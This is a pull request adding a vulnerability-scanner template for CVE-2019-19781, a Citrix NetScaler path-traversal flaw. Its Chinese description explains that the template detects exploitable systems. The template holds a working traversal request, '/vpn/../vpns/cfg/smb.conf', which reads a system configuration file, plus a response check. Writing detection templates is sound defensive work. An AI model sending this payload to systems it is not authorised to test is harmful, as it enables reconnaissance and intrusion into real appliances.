### PR TITLE
Add Citrix-CVE-2019-19781 Poc

### DIFF
--- a/pocs/Citrix-CVE-2019-19781-pathtraversal.yml
+++ b/pocs/Citrix-CVE-2019-19781-pathtraversal.yml
@@ -1,0 +1,11 @@
+name: Citrix-CVE-2019-19781-pathtraversal.yml 
+rules:
+  - method: GET
+    path: /vpn/../vpns/cfg/smb.conf
+    follow_redirects: false
+    expression: |
+      status ==200 && response.body.bcontains(encrypt passwords)
+detail:
+  author: su(https://suzzz112113.github.io/#blog)
+  links:
+    - https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/


### PR DESCRIPTION
CVE-2019-19781漏洞可能导致在NetScaler ADC或NetScaler Gateway上任意代码执行。
此poc是检测是否能目录穿越到vpns路径。能穿越则存在RCE突破。